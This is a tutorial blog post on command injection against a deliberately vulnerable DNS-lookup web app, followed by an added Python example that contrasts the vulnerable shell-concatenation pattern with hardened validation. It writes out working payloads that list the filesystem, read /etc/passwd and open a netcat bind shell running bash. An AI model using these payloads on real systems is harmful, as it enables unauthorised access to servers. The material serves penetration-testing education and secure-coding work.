Command Injection Attack Example | Web Applications Hacking | Using Kali Linux
Read up on command injection here.
OWASP testing guide is your best friend while learning web applications hacking or penetration testing.
I tested the attack on two different vulnerable applications, one of which is
Command Injection Attack Example
Ideally, you are supposed to look up DNS and resolve hostnames to IP addresses using this web application. However, the code is vulnerable to a ‘command injection attack’. As you know, in bash we can execute two commands one after the other by typing:
cmd1 && cmd2
Try this in the vulnerable application (the point is to get another command executed on the server):
www.facebook.com && ls /
In the vulnerable application, Facebook’s IP address would first be resolved on the server, and then the second command would be executed, listing the contents of the
Now that you know the command injection vulnerability exists, you can try different commands and construct an attack.
Display the contents of the ‘passwd’ file:
www.facebook.com && cat /etc/passwd
OR invoke netcat to listen for commands on port 8085 of the victim machine:
www.facebook.com && nc -l -p 8085 -e '/bin/bash'
See what we did here? I assume the netcat utility is present on the server, so I tell it to listen on port 8085 (and invoke bash).
Now, from our terminal, we can use our netcat client to connect to that server:
nc 172.X.X.X 8085
We are connected. We can now begin executing commands on the compromised remote machine.
Note that we are a normal user, not root. Hence, we have limited privileges at this point.
However, using the privileges of www-data it is possible for us to deface the website. Note that defacing a website is unacceptable even as part of a penetration test, so do not go through with it.
But in theory, if you wanted to deface the website:
It is now possible to edit this file to make changes that deface the website.
Note that you can terminate the first command simply by typing ; and hence don’t always need the first part, that is, www.facebook.com. For example:
; cat /etc/passwd
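Both the `&&` and the `;` payloads above work for the same reason: the application glues the user-supplied hostname into a shell command line. The following is an added example, not code from the original post or from the vulnerable application; it shows that bug pattern beside two hardened forms (an allow-list on the input plus in-process resolution, and shell quoting as a fallback) and counts how many commands a shell would actually see. The `host` command name and the sample inputs are constructed for illustration.

```python
# Added example, not code from the original post: the server-side pattern being
# exploited, beside hardened forms. Nothing here runs a shell; command lines are
# built and tokenised so the effect of '&&' and ';' is visible offline.
import re
import shlex
import socket

# Constructed sample inputs: one legitimate hostname, two payloads from the post.
LEGIT = "www.facebook.com"
PAYLOAD_AND = "www.facebook.com && ls /"
PAYLOAD_SEMI = "; cat /etc/passwd"
# Allow-list for a DNS name: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

def vulnerable_command(user_input: str) -> str:
    # The bug: user text is glued into a command line that is then handed to a
    # shell (system(), shell=True, backticks), so metacharacters keep their meaning.
    return "host " + user_input

def quoted_command(user_input: str) -> str:
    # Partial mitigation when a shell is unavoidable: the value becomes ONE word.
    return "host " + shlex.quote(user_input)

def shell_command_count(command_line: str) -> int:
    # How many separate commands a POSIX shell would run for this line.
    lex = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lex if tok in ("&&", "||", ";", "|", "&"))

def validate_hostname(user_input: str) -> str:
    # Reject anything that is not a plain hostname. A rejection here is the
    # event a defender wants logged and alerted on.
    host = user_input.strip()
    if len(host) > 253 or not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected hostname input: {host!r}")
    return host

def is_rejected(user_input: str) -> bool:
    try:
        validate_hostname(user_input)
        return False
    except ValueError:
        return True

def safe_resolve(user_input: str, resolver=socket.gethostbyname) -> str:
    # Hardened form: validate, then resolve in-process so there is no shell to
    # inject into. If an external tool is truly needed, pass ["host", host] to
    # subprocess.run with shell=False, never a joined string.
    return resolver(validate_hostname(user_input))
```

The `resolver` parameter exists so the hardened path can be exercised offline; in production it defaults to the standard library resolver.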